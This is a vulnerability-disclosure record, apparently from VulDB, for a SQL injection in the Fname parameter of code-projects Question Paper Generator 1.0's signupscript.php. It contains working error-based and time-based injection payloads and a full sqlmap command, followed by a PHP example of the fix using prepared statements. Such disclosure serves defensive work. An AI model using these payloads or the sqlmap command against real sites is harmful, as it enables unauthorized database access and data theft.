| Title | code-projects question paper 1.0 /signupscript.php SQL Injection |
|---|
| Description | # question-paper-generatorV1.0 – SQL Injection in `/signupscript.php`
## Product Information
| Item | Details |
|------|---------|
| **Affected Product** | question paper generator|
| **Vendor Homepage** | [https://code-projects.org/question-paper-generator-in-php-with-source-code](https://code-projects.org/question-paper-generator-in-php-with-source-code)|
| **Download Link** | [https://code-projects.org/question-paper-generator-in-php-with-source-code/download](https://download.code-projects.org/details/3fcbd9f2-7bfd-4f7a-83e8-9080b80c3c77) |
| **Version** | V1.0 |
| **Vulnerable File** | `/signupscript.php` |
| **Submitter** | yudeshui |
## Vulnerability Summary
| Field | Description |
|-------|-------------|
| **Vulnerability Type** | SQL Injection |
| **Root Cause** | The `Fname` POST parameter is concatenated directly into the SQL query without sanitization or validation. |
| **Authentication Required** | None – exploitable remotely and anonymously |
| **Impact** | Unauthorized database access, data leakage, alteration or deletion, full system compromise, denial of service |
## Proof-of-Concept Payloads
```
Parameter: Fname (POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: Fname=Test2' AND EXTRACTVALUE(8456,CONCAT(0x5c,0x7176767071,(SELECT (ELT(8456=8456,1))),0x7178707671)) AND 'pkVI'='pkVI&Lname=User2&contact=2002002002&collg=College2&board=Board2&[email protected]&passwd=pass2&address=TestAddr2&country=Country2&desc=Desc2&type=teacher
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: Fname=Test2' RLIKE SLEEP(5) AND 'uGbW'='uGbW&Lname=User2&contact=2002002002&collg=College2&board=Board2&[email protected]&passwd=pass2&address=TestAddr2&country=Country2&desc=Desc2&type=teacher
```
## Quick Verification with sqlmap
```bash
sqlmap -u "http://dede:802/signupscript.php" \
--data="Fname=Test2&Lname=User2&contact=2002002002&collg=College2&board=Board2&[email protected]&passwd=pass2&address=TestAddr2&country=Country2&desc=Desc2&type=teacher" \
--level=5 --risk=3 --batch --dbms mysql
```
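The root cause above, string concatenation of `Fname`, shown beside a parameterized form. This is an added example, not the project's code: the `users` table, its columns, the helper names, and the use of PDO with in-memory SQLite in place of the application's MySQL database are assumptions made so the script runs offline.

```php
<?php
// Added example, not the project's code. Table and column names are
// hypothetical; in-memory SQLite (pdo_sqlite) stands in for MySQL so the
// script runs offline. Only three of the form's fields are stored.
const REQUIRED = ['Fname', 'Lname', 'email'];

// The pattern named under Root Cause: request data spliced into SQL text.
// The string is only printed here, never executed.
function build_concatenated_sql(array $post): string
{
    return "INSERT INTO users (fname, lname, email) VALUES ('"
        . $post['Fname'] . "', '" . $post['Lname'] . "', '" . $post['email'] . "')";
}

// Hardened form: reject malformed input (255 is an arbitrary cap), then bind every value.
function signup(PDO $db, array $post): int
{
    foreach (REQUIRED as $field) {
        $v = $post[$field] ?? null;
        if (!is_string($v) || $v === '' || strlen($v) > 255) {
            throw new InvalidArgumentException("invalid field: $field");
        }
    }
    $stmt = $db->prepare(
        'INSERT INTO users (fname, lname, email) VALUES (:fname, :lname, :email)'
    );
    $stmt->execute([
        ':fname' => $post['Fname'],
        ':lname' => $post['Lname'],
        ':email' => $post['email'],
    ]);
    return (int) $db->lastInsertId();
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, fname TEXT, lname TEXT, email TEXT)');

// Constructed request reusing the time-based payload shape shown above.
$post = [
    'Fname' => "Test2' RLIKE SLEEP(5) AND 'uGbW'='uGbW",
    'Lname' => 'User2',
    'email' => 'user2@example.test',
];

echo build_concatenated_sql($post), "\n"; // the quote after Test2 ends the literal early

$check = $db->prepare('SELECT fname FROM users WHERE id = ?');
$check->execute([signup($db, $post)]);
var_dump($check->fetchColumn() === $post['Fname']); // payload stored as plain text
```

Against MySQL the same code applies with a `mysql:` DSN; setting `PDO::ATTR_EMULATE_PREPARES` to `false` makes the driver use server-side prepared statements.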
|
|---|
| Source | ⚠️ https://github.com/rassec2/dbcve/issues/6 |
|---|
| User | yudeshui (UID 91129) |
|---|
| Submission | 21/11/2025 17h14 (5 months ago) |
|---|
| Moderation | 23/11/2025 10h49 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 333347 [code-projects Question Paper Generator 1.0 POST Parameter /signupscript.php Fname SQL Injection] |
|---|
| Points | 20 |
|---|